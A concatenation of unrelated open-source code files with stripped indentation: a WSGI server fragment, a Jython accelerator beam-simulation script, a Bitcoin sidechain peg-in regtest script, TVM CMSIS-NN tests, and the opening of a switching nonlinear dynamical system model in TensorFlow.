timerThread = threading.Thread(target=keep_retrieve_data)
timerThread.daemon = True
timerThread.start()
with make_server('', 8000, APIApplication(simple_app)) as httpd:
print("Serving on port 8000...")
httpd.serve_forever()
|
<reponame>luxiaohan/openxal-csns-luxh<filename>core/src/xal/sim/slg/Dscript.py
#!/usr/bin/env jython
import sys
from java.lang import *
from java.util import *
from java.io import *
from org.xml.sax import *
from gov.sns.xal.smf import *
from gov.sns.xal.smf.impl import *
from gov.sns.xal.smf.impl.qualify import *
from gov.sns.xal.smf.xdxf import *
from gov.sns.xal.smf.parser import *
from gov.sns.xal.smf.data import *
from gov.sns.xal.model import *
from gov.sns.xal.model.xml import *
from gov.sns.tools.beam import *
###################################################################################
false= (1<0)
true=(1>0)
latin="MEBT"
#latin="lanl_MEBT"
#probin="particle"
probin="envelope"
# lattice input locations
lat_file={
"MEBT":"xml/MEBT_lanl_lattice.xml",
"lanl_MEBT":"/home/klotz/workspace/xaldev/work/xml/ModelValidation.lat.mod.xal.xml"}
# probe input locations
prb_file={
"??":"workspace/xaldev/xal_xmls/sns_probes.xml",
"particle":"/home/klotz/workspace/xaldev/work/xml/ModelValidation.particle.probe.mod.xal.xml",
"envelope":"/home/klotz/workspace/xaldev/work/xml/ModelValidation.envelope.probe.mod.xal.xml"}
def showParticleProbe(traj):
iterState= traj.stateIterator()
count=0
print "PARTICLE PROBE RESULTS"
titles = " Position Energy x x' y y'"
titles+= "\n======================================================================="
print titles
while iterState.hasNext():
count += 1
if count%10==0:
print "\n",titles
state= iterState.next()
s= state.getPosition()
W= state.getKineticEnergy()
phasevect= state.phaseCoordinates()
x= phasevect.getx()
xp=phasevect.getxp()
y =phasevect.gety()
yp=phasevect.getyp()
#digits=8
#buffer = repr(s)[:digits]
#buffer+= " "+repr(W)[:digits]
#buffer+= " "+repr(x)[:digits]
#buffer+= " "+repr(xp)[:digits]
#buffer+= " "+repr(y)[:digits]
#buffer+= " "+repr(yp)[:digits]
float="%+010f"
scien="%+010.3e"
digits = float % s
buffer = digits
digits = scien % W
buffer += " "+digits
digits = float % x
buffer += " "+digits
digits = float % xp
buffer += " "+digits
digits = float % y
buffer += " "+digits
digits = float % yp
buffer += " "+digits
buffer += " "+state.getElementId()
print buffer
def showEnvelopeProbe(traj):
iterState= traj.stateIterator()
count=0
print "ENVELOPE PROBE RESULTS"
titles = " Position eps-x x x' eps-y y y'"
titles+= "\n===================================================================================="
print titles
while iterState.hasNext():
count += 1
if count%10==0:
print "\n",titles
state= iterState.next()
s= state.getPosition()
twiss= state.twissParameters()
x = twiss[0].getEnvelopeRadius()
xp= twiss[0].getEnvelopeSlope()
ex= twiss[0].getEmittance()
y = twiss[1].getEnvelopeRadius()
yp= twiss[1].getEnvelopeSlope()
ey= twiss[1].getEmittance()
float="%+010f"
scien="%+010.3e"
digits = float % s
buffer = digits
digits = scien % ex
buffer += " "+digits
digits = float % x
buffer += " "+digits
digits = float % xp
buffer += " "+digits
digits = scien % ey
buffer += " "+digits
digits = float % y
buffer += " "+digits
digits = float % yp
buffer += " "+digits
buffer += " "+state.getElementId()
print buffer
if __name__ == '__main__':
#load the lattice
try:
cin=lat_file[latin]
print "Using '",cin,"' as lattice input"
print "======================================================"
lattice = LatticeXmlParser.parse(cin,false)
#dump current state and content to output
buffer = "LATTICE - "+lattice.getType()
buffer += "\nID :"+lattice.getId()
buffer += "\nAuthor :"+lattice.getAuthor()
buffer += "\nDate :"+lattice.getDate()
buffer += "\nVersion :"+lattice.getVersion()
buffer += "\nComments :"+lattice.getComments()
buffer += "\nChildren :"+repr(lattice.getChildCount())
buffer += "\nLeaves :"+repr(lattice.getLeafCount())
buffer += "\nLength :"+repr(lattice.getLength())
buffer += "\n================================================"
print buffer
cout= PrintWriter(System.out, Boolean("true"))
#lattice.print(cout)
except ParsingException:
print ParsingException.getMessage()
sys.exit(-1)
except Exception:
print Exception.getMessage()
sys.exit(-1)
#laod the probe
try:
cin=prb_file[probin]
print "Using '",cin,"' as probe input"
print "======================================================"
envProbe=ProbeXmlParser.parse(cin)
#dump some initial probe parameters
buffer = "PROBE - " +repr(envProbe.getComment())
buffer += "\nBeta :"+repr(envProbe.getBeta())
buffer += "\nGamma :"+repr(envProbe.getGamma())
buffer += "\nKinetic Energy :"+repr(envProbe.getKineticEnergy())
buffer += "\nPosition :"+repr(envProbe.getPosition())
buffer += "\nSpecies Charge :"+repr(envProbe.getSpeciesCharge())
buffer += "\nSpecies Rest Energy:"+repr(envProbe.getSpeciesRestEnergy())
buffer += "\n================================================"
print buffer
except ParsingException:
print ParsingException.getMessage()
sys.exit(-1)
except Exception:
print Exception.getMessage()
sys.exit(-1)
#propagate the probe
try:
lattice.propagate(envProbe)
envTraj= envProbe.getTrajectory()
envTraj.setDescription("validation trajectory")
except ModelException:
print ModelException.getMessage()
sys.exit(-1)
except Exception:
print Exception.getMessage()
sys.exit(-1)
#show results
if probin == "particle":
showParticleProbe(envTraj)
if probin == "envelope":
showEnvelopeProbe(envTraj)
|
#!/usr/bin/env python2
from test_framework.authproxy import AuthServiceProxy, JSONRPCException
import os
import random
import sys
import time
import subprocess
import shutil
from decimal import Decimal
if len(sys.argv) < 2:
print("path to bitcoind must be included as argument")
sys.exit(0)
bitcoin_bin_path = sys.argv[1]
sidechain_bin_path = os.path.normpath(os.path.dirname(os.path.realpath(__file__))+"/../../src")
if len(sys.argv) > 2:
sidechain_bin_path = sys.argv[2]
print(bitcoin_bin_path)
print(sidechain_bin_path)
# Sync mempool, make a block, sync blocks
def sync_all(sidechain, sidechain2, makeblock=True):
block = ""
timeout = 20
while len(sidechain.getrawmempool()) != len(sidechain2.getrawmempool()):
time.sleep(1)
timeout -= 1
if timeout == 0:
raise Exception("Peg-in has failed to propagate.")
if makeblock:
block = sidechain2.generate(1)
while sidechain.getblockcount() != sidechain2.getblockcount():
time.sleep(1)
timeout -= 1
if timeout == 0:
raise Exception("Blocks are not propagating.")
return block
fedpeg_key="<KEY>"
fedpeg_pubkey="512103dff4923d778550cc13ce0d887d737553b4b58f4e8e886507fc39f5e447b2186451ae"
def get_pseudorandom_str(str_length=10):
return ''.join(random.choice('0123456789ABCDEF') for i in range(str_length))
def get_temp_dir(nodename):
return "/tmp/%s_%s" % (nodename, get_pseudorandom_str())
bitcoin_datadir = get_temp_dir('bitcoin')
bitcoin_pass = get_pseudorandom_str()
sidechain_datadir = get_temp_dir('sidechain')
sidechain_pass = get_pseudorandom_str()
sidechain2_datadir = get_temp_dir('sidechain2')
sidechain2_pass = get_pseudorandom_str()
bitcoin2_datadir = get_temp_dir('bitcoin2')
bitcoin2_rpccookiefile = bitcoin2_datadir + '/regtest/.cookie'
bitcoin_port = 8000 + os.getpid()%999
sidechain_port = bitcoin_port + 1
sidechain2_port = bitcoin_port + 2
sidechain1_p2p_port = bitcoin_port + 3
sidechain2_p2p_port = bitcoin_port + 4
bitcoin2_port = bitcoin_port + 5
bitcoin2_p2p_port = bitcoin_port + 6
bitcoin_p2p_port = bitcoin_port + 7
bitcoin = None
bitcoin2 = None
sidechain = None
sidechain2 = None
os.makedirs(bitcoin_datadir)
os.makedirs(sidechain_datadir)
os.makedirs(sidechain2_datadir)
os.makedirs(bitcoin2_datadir)
def write_bitcoin_conf(datadir, rpcport, rpcpass=None, p2p_port=None, connect_port=None):
with open(os.path.join(datadir, "bitcoin.conf"), 'w') as f:
f.write("regtest=1\n")
if p2p_port:
f.write("port="+str(p2p_port)+"\n")
if rpcpass:
f.write("rpcuser=bitcoinrpc\n")
f.write("rpcpassword="+rpcpass+"\n")
f.write("rpcport="+str(rpcport)+"\n")
f.write("discover=0\n")
f.write("testnet=0\n")
f.write("txindex=1\n")
f.write("daemon=1\n")
# To make sure bitcoind gives back p2pkh no matter version
f.write("addresstype=legacy\n")
if connect_port:
f.write("connect=localhost:"+str(connect_port)+"\n")
f.write("listen=1\n")
else:
f.write("listen=0\n")
write_bitcoin_conf(bitcoin_datadir, bitcoin_port, bitcoin_pass, p2p_port=bitcoin_p2p_port, connect_port=bitcoin2_p2p_port)
write_bitcoin_conf(bitcoin2_datadir, bitcoin2_port, rpcpass=<PASSWORD>, p2p_port=bitcoin2_p2p_port, connect_port=bitcoin_p2p_port)
with open(os.path.join(sidechain_datadir, "ocean.conf"), 'w') as f:
f.write("regtest=1\n")
f.write("rpcuser=sidechainrpc\n")
f.write("rpcpassword="+sidechain_pass+"\n")
f.write("rpcport="+str(sidechain_port)+"\n")
f.write("discover=0\n")
f.write("testnet=0\n")
f.write("txindex=1\n")
f.write("fedpegscript="+fedpeg_pubkey+"\n")
f.write("daemon=1\n")
f.write("mainchainrpchost=127.0.0.1\n")
f.write("mainchainrpcport="+str(bitcoin_port)+"\n")
f.write("mainchainrpcuser=bitcoinrpc\n")
f.write("mainchainrpcpassword="+bitcoin_pass+"\n")
f.write("validatepegin=1\n")
f.write("port="+str(sidechain1_p2p_port)+"\n")
f.write("connect=localhost:"+str(sidechain2_p2p_port)+"\n")
f.write("listen=1\n")
f.write("fallbackfee=0.0001\n")
f.write("initialfreecoins=2100000000000000\n")
with open(os.path.join(sidechain2_datadir, "ocean.conf"), 'w') as f:
f.write("regtest=1\n")
f.write("rpcuser=sidechainrpc2\n")
f.write("rpcpassword="+sidechain2_pass+"\n")
f.write("rpcport="+str(sidechain2_port)+"\n")
f.write("discover=0\n")
f.write("testnet=0\n")
f.write("txindex=1\n")
f.write("fedpegscript="+fedpeg_pubkey+"\n")
f.write("daemon=1\n")
f.write("mainchainrpchost=127.0.0.1\n")
f.write("mainchainrpcport="+str(bitcoin2_port)+"\n")
f.write("mainchainrpccookiefile=%s\n" % bitcoin2_rpccookiefile)
f.write("validatepegin=1\n")
f.write("port="+str(sidechain2_p2p_port)+"\n")
f.write("connect=localhost:"+str(sidechain1_p2p_port)+"\n")
f.write("listen=1\n")
f.write("fallbackfee=0.0001\n")
f.write("initialfreecoins=2100000000000000\n")
def test_pegout(parent_chain_addr, sidechain):
pegout_txid = sidechain.sendtomainchain(parent_chain_addr, 1)
raw_pegout = sidechain.getrawtransaction(pegout_txid, True)
assert 'vout' in raw_pegout and len(raw_pegout['vout']) > 0
pegout_tested = False
for output in raw_pegout['vout']:
scriptPubKey = output['scriptPubKey']
if 'type' in scriptPubKey and scriptPubKey['type'] == 'nulldata':
assert ('pegout_hex' in scriptPubKey and 'pegout_asm' in scriptPubKey and 'pegout_type' in scriptPubKey and
'pegout_chain' in scriptPubKey and 'pegout_reqSigs' in scriptPubKey and 'pegout_addresses' in scriptPubKey)
assert scriptPubKey['pegout_chain'] == '<KEY>' #testnet3
assert scriptPubKey['pegout_reqSigs'] == 1
assert parent_chain_addr in scriptPubKey['pegout_addresses']
pegout_tested = True
break
assert pegout_tested
try:
# Default is 8, meaning 8+2 confirms for wallet acceptance normally
# this will require 10+2.
sidechain_args = " -peginconfirmationdepth=10 "
# Start daemons
print("Starting daemons at "+bitcoin_datadir+", "+bitcoin2_datadir+", "+sidechain_datadir+" and "+sidechain2_datadir)
bitcoindstart = bitcoin_bin_path+"/bitcoind -datadir="+bitcoin_datadir
subprocess.Popen(bitcoindstart.split(), stdout=subprocess.PIPE)
bitcoind2start = bitcoin_bin_path+"/bitcoind -datadir="+bitcoin2_datadir
subprocess.Popen(bitcoind2start.split(), stdout=subprocess.PIPE)
sidechainstart = sidechain_bin_path+"/oceand -datadir="+sidechain_datadir + sidechain_args
subprocess.Popen(sidechainstart.split(), stdout=subprocess.PIPE)
sidechain2start = sidechain_bin_path+"/oceand -datadir="+sidechain2_datadir + sidechain_args
subprocess.Popen(sidechain2start.split(), stdout=subprocess.PIPE)
print("Daemons started")
time.sleep(3)
with open(bitcoin2_rpccookiefile, 'r') as f:
bitcoin2_rpccookie = f.readline()
bitcoin = AuthServiceProxy("http://bitcoinrpc:"+bitcoin_pass+"@127.0.0.1:"+str(bitcoin_port))
bitcoin2 = AuthServiceProxy("http://"+ bitcoin2_rpccookie +"@127.0.0.1:"+str(bitcoin2_port))
sidechain = AuthServiceProxy("http://sidechainrpc:"+sidechain_pass+"@127.0.0.1:"+str(sidechain_port))
sidechain2 = AuthServiceProxy("http://sidechainrpc2:"+sidechain2_pass+"@127.0.0.1:"+str(sidechain2_port))
print("Daemons started, making blocks to get funds")
bitcoin.generate(101)
sidechain.generate(101)
addr = bitcoin.getnewaddress()
# First, blackhole all 21M bitcoin that already exist(and test subtractfrom)
assert(sidechain.getwalletinfo()["balance"]["bitcoin"] == 21000000)
sidechain.sendtomainchain(addr, 21000000, True)
assert("bitcoin" not in sidechain.getwalletinfo()["balance"])
sidechain.generate(101)
addrs = sidechain.getpeginaddress()
txid1 = bitcoin.sendtoaddress(addrs["mainchain_address"], 24)
# 10+2 confirms required to get into mempool and confirm
bitcoin.generate(1)
time.sleep(2)
proof = bitcoin.gettxoutproof([txid1])
raw = bitcoin.getrawtransaction(txid1)
print("Attempting peg-in")
# First attempt fails the consensus check but gives useful result
try:
pegtxid = sidechain.claimpegin(raw, proof)
raise Exception("Peg-in should not be mature enough yet, need another block.")
except JSONRPCException as e:
assert("Peg-in Bitcoin transaction needs more confirmations to be sent." in e.error["message"])
pass
# Second attempt simply doesn't hit mempool bar
bitcoin.generate(10)
try:
pegtxid = sidechain.claimpegin(raw, proof)
raise Exception("Peg-in should not be mature enough yet, need another block.")
except JSONRPCException as e:
assert("Peg-in Bitcoin transaction needs more confirmations to be sent." in e.error["message"])
pass
# Should fail due to non-matching wallet address
try:
pegtxid = sidechain.claimpegin(raw, proof, sidechain.getnewaddress())
raise Exception("Peg-in with non-matching claim_script should fail.")
except JSONRPCException as e:
assert("Given claim_script does not match the given Bitcoin transaction." in e.error["message"])
pass
# 12 confirms allows in mempool
bitcoin.generate(1)
# Should succeed via wallet lookup for address match, and when given
pegtxid1 = sidechain.claimpegin(raw, proof)
# Will invalidate the block that confirms this transaction later
sync_all(bitcoin, bitcoin2)
blockhash = sync_all(sidechain, sidechain2)
sidechain.generate(5)
tx1 = sidechain.gettransaction(pegtxid1)
if "confirmations" in tx1 and tx1["confirmations"] == 6:
print("Peg-in is confirmed: Success!")
else:
raise Exception("Peg-in confirmation has failed.")
# Look at pegin fields
decoded = sidechain.decoderawtransaction(tx1["hex"])
assert decoded["vin"][0]["is_pegin"] == True
assert len(decoded["vin"][0]["pegin_witness"]) > 0
# Check that there's sufficient fee for the peg-in
vsize = decoded["vsize"]
fee_output = decoded["vout"][1]
fallbackfee_pervbyte = Decimal("0.00001")/Decimal("1000")
assert fee_output["scriptPubKey"]["type"] == "fee"
assert fee_output["value"] >= fallbackfee_pervbyte*vsize
# Quick reorg checks of pegs
sidechain.invalidateblock(blockhash[0])
if sidechain.gettransaction(pegtxid1)["confirmations"] != 0:
raise Exception("Peg-in didn't unconfirm after invalidateblock call.")
# Re-enters block
sidechain.generate(1)
if sidechain.gettransaction(pegtxid1)["confirmations"] != 1:
raise Exception("Peg-in should have one confirm on side block.")
sidechain.reconsiderblock(blockhash[0])
if sidechain.gettransaction(pegtxid1)["confirmations"] != 6:
raise Exception("Peg-in should be back to 6 confirms.")
# Do many claims in mempool
n_claims = 5
print("Flooding mempool with many small claims")
pegtxs = []
sidechain.generate(101)
for i in range(n_claims):
addrs = sidechain.getpeginaddress()
txid = bitcoin.sendtoaddress(addrs["mainchain_address"], 1)
bitcoin.generate(12)
proof = bitcoin.gettxoutproof([txid])
raw = bitcoin.getrawtransaction(txid)
pegtxs += [sidechain.claimpegin(raw, proof)]
sync_all(bitcoin, bitcoin2)
sync_all(sidechain, sidechain2)
sidechain2.generate(1)
for pegtxid in pegtxs:
tx = sidechain.gettransaction(pegtxid)
if "confirmations" not in tx or tx["confirmations"] == 0:
raise Exception("Peg-in confirmation has failed.")
print("Test pegout")
test_pegout(bitcoin.getnewaddress(), sidechain)
print("Test pegout P2SH")
parent_chain_addr = bitcoin.getnewaddress()
parent_pubkey = bitcoin.validateaddress(parent_chain_addr)["pubkey"]
parent_chain_p2sh_addr = bitcoin.createmultisig(1, [parent_pubkey])["address"]
test_pegout(parent_chain_p2sh_addr, sidechain)
print("Test pegout Garbage")
parent_chain_addr = "garbage"
try:
test_pegout(parent_chain_addr, sidechain)
raise Exception("A garbage address should fail.")
except JSONRPCException as e:
assert("Invalid Bitcoin address" in e.error["message"])
pass
print("Test pegout Garbage valid")
prev_txid = sidechain.sendtoaddress(sidechain.getnewaddress(), 1)
sidechain.generate(1)
pegout_chain = 'a' * 64
pegout_hex = 'b' * 500
inputs = [{"txid": prev_txid, "vout": 0}]
outputs = {"vdata": [pegout_chain, pegout_hex]}
rawtx = sidechain.createrawtransaction(inputs, outputs)
raw_pegout = sidechain.decoderawtransaction(rawtx)
assert 'vout' in raw_pegout and len(raw_pegout['vout']) > 0
pegout_tested = False
for output in raw_pegout['vout']:
scriptPubKey = output['scriptPubKey']
if 'type' in scriptPubKey and scriptPubKey['type'] == 'nulldata':
assert ('pegout_hex' in scriptPubKey and 'pegout_asm' in scriptPubKey and 'pegout_type' in scriptPubKey and
'pegout_chain' in scriptPubKey and 'pegout_reqSigs' not in scriptPubKey and 'pegout_addresses' not in scriptPubKey)
assert scriptPubKey['pegout_type'] == 'nonstandard'
assert scriptPubKey['pegout_chain'] == pegout_chain
assert scriptPubKey['pegout_hex'] == pegout_hex
pegout_tested = True
break
assert pegout_tested
print ("Now test failure to validate peg-ins based on intermittant bitcoind rpc failure")
bitcoin2.stop()
# give bitcoin2 time to stop
time.sleep(1)
txid = bitcoin.sendtoaddress(addrs["mainchain_address"], 1)
bitcoin.generate(12)
proof = bitcoin.gettxoutproof([txid])
raw = bitcoin.getrawtransaction(txid)
stuck_peg = sidechain.claimpegin(raw, proof)
sidechain.generate(1)
print("Waiting to ensure block is being rejected by sidechain2")
time.sleep(5)
assert(sidechain.getblockcount() != sidechain2.getblockcount())
bitcoind2start = bitcoin_bin_path+"/bitcoind -datadir="+bitcoin2_datadir
subprocess.Popen(bitcoind2start.split(), stdout=subprocess.PIPE)
print("Restarting bitcoind2")
time.sleep(5)
with open(bitcoin2_rpccookiefile, 'r') as f:
bitcoin2_rpccookie = f.readline()
bitcoin2 = AuthServiceProxy("http://"+ bitcoin2_rpccookie +"@127.0.0.1:"+str(bitcoin2_port))
# Don't make a block, race condition when pegin-invalid block
# is awaiting further validation, nodes reject subsequent blocks
# even ones they create
sync_all(sidechain, sidechain2, False)
print("Now send funds out in two stages, partial, and full")
some_btc_addr = bitcoin.getnewaddress()
bal_1 = sidechain.getwalletinfo()["balance"]["bitcoin"]
try:
sidechain.sendtomainchain(some_btc_addr, bal_1 + 1)
raise Exception("Sending out too much; should have failed")
except JSONRPCException as e:
assert("Insufficient funds" in e.error["message"])
pass
assert(sidechain.getwalletinfo()["balance"]["bitcoin"] == bal_1)
try:
sidechain.sendtomainchain(some_btc_addr+"b", bal_1 - 1)
raise Exception("Sending to invalid address; should have failed")
except JSONRPCException as e:
assert("Invalid Bitcoin address" in e.error["message"])
pass
assert(sidechain.getwalletinfo()["balance"]["bitcoin"] == bal_1)
try:
sidechain.sendtomainchain("1Nro9WkpaKm9axmcfPVp79dAJU1Gx7VmMZ", bal_1 - 1)
raise Exception("Sending to mainchain address when should have been testnet; should have failed")
except JSONRPCException as e:
assert("Invalid Bitcoin address" in e.error["message"])
pass
assert(sidechain.getwalletinfo()["balance"]["bitcoin"] == bal_1)
peg_out_txid = sidechain.sendtomainchain(some_btc_addr, 1)
peg_out_details = sidechain.decoderawtransaction(sidechain.getrawtransaction(peg_out_txid))
# peg-out, change
assert(len(peg_out_details["vout"]) == 3)
found_pegout_value = False
for output in peg_out_details["vout"]:
if "value" in output and output["value"] == 1:
found_pegout_value = True
assert(found_pegout_value)
bal_2 = sidechain.getwalletinfo()["balance"]["bitcoin"]
# Make sure balance went down
assert(bal_2 + 1 < bal_1)
sidechain.sendtomainchain(some_btc_addr, bal_2, True)
assert("bitcoin" not in sidechain.getwalletinfo()["balance"])
print("Success!")
except JSONRPCException as e:
print("Pegging testing failed, aborting:")
print(e.error)
except Exception as e:
print("Pegging testing failed, aborting:")
print(e)
print("Stopping daemons and cleaning up")
if bitcoin is not None:
bitcoin.stop()
if bitcoin2 is not None:
bitcoin2.stop()
if sidechain is not None:
sidechain.stop()
if sidechain2 is not None:
sidechain2.stop()
time.sleep(5)
shutil.rmtree(bitcoin2_datadir)
shutil.rmtree(sidechain2_datadir)
shutil.rmtree(sidechain_datadir)
shutil.rmtree(bitcoin_datadir)
|
<filename>tests/python/contrib/test_cmsisnn/test_extract_constants.py<gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""CMSIS-NN integration tests: extract_constants pass"""
import itertools
import math
import numpy as np
import pytest
import tvm
from tvm import relay
from utils import (
make_module,
count_num_calls,
get_range_for_dtype_str,
get_same_padding,
get_conv2d_qnn_params,
make_qnn_relu,
)
tvm._ffi._init_api("relay.ext.cmsisnn.transform", __name__)
class CheckFunctionsForConstants(tvm.relay.ExprVisitor):
def __init__(self):
super().__init__()
self.num_constants_ = 0
def visit_call(self, call):
super().visit_call(call)
for arg in call.args:
if isinstance(arg, relay.Constant) and arg.data.numpy().ndim > 0:
self.num_constants_ += 1
def visit_function(self, func):
super().visit_function(func)
assert self.num_constants_ == 0, "Functions should not have constant arguments in Calls"
def set_external_func_attr(func, compiler, ext_symbol):
func = func.with_attr("Primitive", tvm.tir.IntImm("int32", 1))
func = func.with_attr("Compiler", compiler)
func = func.with_attr("global_symbol", ext_symbol)
return func
@tvm.testing.requires_cmsisnn
def test_external_function():
y0_data = np.random.uniform(0, 1, (8, 8)).astype("float32")
x0 = relay.var("x0", shape=(8, 8))
y0_const = relay.const(y0_data, "float32")
z0 = x0 + y0_const
ef = relay.Function([x0], z0, relay.TensorType((8, 8), "float32"))
ev = relay.GlobalVar("external_function")
ef = set_external_func_attr(ef, "external_compiler", ev.name_hint)
x = relay.var("x", shape=(8, 8))
c = relay.Call(ev, [x])
mf = relay.Function([x], c, relay.TensorType((8, 8), "float32"))
mv = relay.GlobalVar("main")
mod = tvm.IRModule()
mod[ev] = ef
mod[mv] = mf
mod = ExtractConstantsFromPartitionedFunction()(mod)
CheckFunctionsForConstants().visit_function(mod[ev])
relay.transform.InferType()(mod)
@tvm.testing.requires_cmsisnn
def test_nested_function():
y1_data = np.random.uniform(0, 1, (8, 8)).astype("float32")
x1 = relay.var("x1", shape=(8, 8))
y1_const = relay.const(y1_data, "float32")
z1 = x1 + y1_const
w1 = z1 * relay.const(5.0, "float32")
lf = relay.Function([x1], w1, relay.TensorType((8, 8), "float32"))
x0 = relay.var("x0", shape=(8, 8))
c0 = relay.Call(lf, [x0])
ef = relay.Function([x0], c0, relay.TensorType((8, 8), "float32"))
x = relay.var("x", shape=(8, 8))
ev = relay.GlobalVar("external_function")
ef = set_external_func_attr(ef, "external_compiler", ev.name_hint)
c = relay.Call(ev, [x])
mf = relay.Function([x], c, relay.TensorType((8, 8), "float32"))
mv = relay.GlobalVar("main")
mod = tvm.IRModule()
mod[ev] = ef
mod[mv] = mf
mod = ExtractConstantsFromPartitionedFunction()(mod)
CheckFunctionsForConstants().visit_function(mod[ev])
relay.transform.InferType()(mod)
@tvm.testing.requires_cmsisnn
def test_multiple_functions():
y20_data = np.random.uniform(0, 1, (8, 8)).astype("float32")
x20 = relay.var("x20", shape=(8, 8))
y20_const = relay.const(y20_data, "float32")
z20 = x20 + y20_const
f20 = relay.Function([x20], z20, relay.TensorType((8, 8), "float32"))
y21_data = np.random.uniform(0, 1, (8, 8)).astype("float32")
x21 = relay.var("x21", shape=(8, 8))
y21_const = relay.const(y21_data, "float32")
z21 = x21 + y21_const
f21 = relay.Function([x21], z21, relay.TensorType((8, 8), "float32"))
x10 = relay.var("x10", shape=(8, 8))
c10 = relay.Call(f20, [x10])
c11 = relay.Call(f21, [c10])
ef = relay.Function([x10], c11, relay.TensorType((8, 8), "float32"))
x0 = relay.var("x0", shape=(8, 8))
ev = relay.GlobalVar("external_function")
ef = set_external_func_attr(ef, "external_compiler", ev.name_hint)
c = relay.Call(ev, [x0])
mf = relay.Function([x0], c, relay.TensorType((8, 8), "float32"))
mv = relay.GlobalVar("main")
mod = tvm.IRModule()
mod[ev] = ef
mod[mv] = mf
mod = ExtractConstantsFromPartitionedFunction()(mod)
CheckFunctionsForConstants().visit_function(mod[ev])
relay.transform.InferType()(mod)
@tvm.testing.requires_cmsisnn
def test_main_function():
x0 = relay.var("x0", shape=(8, 8))
y0 = relay.var("y0", shape=(8, 8))
z0 = x0 + y0
ef = relay.Function([x0, y0], z0, relay.TensorType((8, 8), "float32"))
ev = relay.GlobalVar("external_function")
ef = set_external_func_attr(ef, "external_compiler", ev.name_hint)
x = relay.var("x", shape=(8, 8))
y_data = np.random.uniform(0, 1, (8, 8)).astype("float32")
y_const = relay.const(y_data, "float32")
z = x + y_const
c = relay.Call(ev, [x, z])
mf = relay.Function([x], c, relay.TensorType((8, 8), "float32"))
mv = relay.GlobalVar("main")
mod = tvm.IRModule()
mod[ev] = ef
mod[mv] = mf
mod = ExtractConstantsFromPartitionedFunction()(mod)
check_for_constants = CheckFunctionsForConstants()
check_for_constants.visit_call(mod[mv].body)
assert (
check_for_constants.num_constants_ == 1
), "main() should have same number of arguments as before"
if __name__ == "__main__":
sys.exit(pytest.main([__file__] + sys.argv[1:]))
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collapsed Amortized Variational Inference for SNLDS.
This is a reasonable baseline model for switching non-linear dynamical system
with the following architecture:
1. an inference network, with Bidirectional-RNN for input embedding, and a
forward RNN to get the posterior distribution of `q(z[1:T] | x[1:T])`.
2. a continuous state transition network, `p(z[t] | z[t-1], s[t])`.
3. a discrete state transition network that conditioned on the input,
`p(s[t] | s[t-1], x[t-1])`.
4. an emission network conditioned on the continuous hidden dynamics,
`p(x[t] | z[t])`.
It also contains a function, `create_model()`, to help to create the SNLDS
model discribed in ``Collapsed Amortized Variational Inference for Switching
Nonlinear Dynamical Systems``. 2019. https://arxiv.org/abs/1910.09588.
All the networks are configurable through function arguments `network_*`.
"""
import collections
import tensorflow as tf
import tensorflow_probability as tfp
from snlds import model_base
from snlds import utils
namedtuple = collections.namedtuple
layers = tf.keras.layers
tfd = tfp.distributions
tfpl = tfp.layers
RANDOM_SEED = 131
def construct_initial_state_distribution(
latent_dim,
num_categ,
use_trainable_cov=False,
use_triangular_cov=False,
raw_sigma_bias=0.0,
sigma_min=1e-5,
sigma_scale=0.05,
dtype=tf.float32,
name="z0"):
"""Construct the initial state distribution, `p(z[0])`.
Args:
latent_dim: an `int` scalar for dimension of continuous hidden states, `z`.
num_categ: an `int` scalar for number of discrete states, `s`.
use_trainable_cov: a `bool` scalar indicating whether the scale of `p(z[0])`
is trainable. Default to False.
use_triangular_cov: a `bool` scalar indicating whether to use triangular
covariance matrices and `tfp.distributions.MultivariateNormalTriL` for
distribution. Otherwise, a diagonal covariance matrices and
`tfp.distributions.MultivariateNormalDiag` will be used.
raw_sigma_bias: a `float` scalar to be added to the raw sigma, which is
standard deviation of the distribution. Default to `0.`.
sigma_min: a `float` scalar for minimal level of sigma to prevent
underflow. Default to `1e-5`.
sigma_scale: a `float` scalar for scaling the sigma. Default to `0.05`.
The above three arguments are used as
`sigma_scale * max(softmax(raw_sigma + raw_sigma_bias), sigma_min))`.
dtype: data type for variables within the scope. Default to `tf.float32`.
name: a `str` to construct names of variables.
Returns:
return_dist: a `tfp.distributions` instance for the initial state
distribution, `p(z[0])`.
"""
glorot_initializer = tf.keras.initializers.GlorotUniform()
z0_mean = tf.Variable(
initial_value=glorot_initializer(shape=[num_categ, latent_dim],
dtype=dtype),
name="{}_mean".format(name))
if use_triangular_cov:
z0_scale = tfp.math.fill_triangular(
tf.Variable(
initial_value=glorot_initializer(
shape=[int(latent_dim * (latent_dim + 1) / 2)],
dtype=dtype),
name="{}_scale".format(name),
trainable=use_trainable_cov))
z0_scale = (tf.maximum(tf.nn.softmax(z0_scale + raw_sigma_bias),
sigma_min)
* sigma_scale)
return_dist = tfd.Independent(
distribution=tfd.MultivariateNormalTriL(
loc=z0_mean, scale_tril=z0_scale),
reinterpreted_batch_ndims=0)
else:
z0_scale = tf.Variable(
initial_value=glorot_initializer(
shape=[latent_dim],
dtype=dtype),
name="{}_scale".format(name),
trainable=use_trainable_cov)
z0_scale = (tf.maximum(tf.nn.softmax(z0_scale + raw_sigma_bias),
sigma_min)
* sigma_scale)
return_dist = tfd.Independent(
distribution=tfd.MultivariateNormalDiag(
loc=z0_mean, scale_diag=z0_scale),
reinterpreted_batch_ndims=0)
return tfp.experimental.as_composite(return_dist)
class ContinuousStateTransition(tf.keras.Model):
"""Transition for `p(z[t] | z[t-1], s[t])`."""
def __init__(self,
transition_mean_networks,
distribution_dim,
num_categories=1,
cov_mat=None,
use_triangular_cov=False,
use_trainable_cov=True,
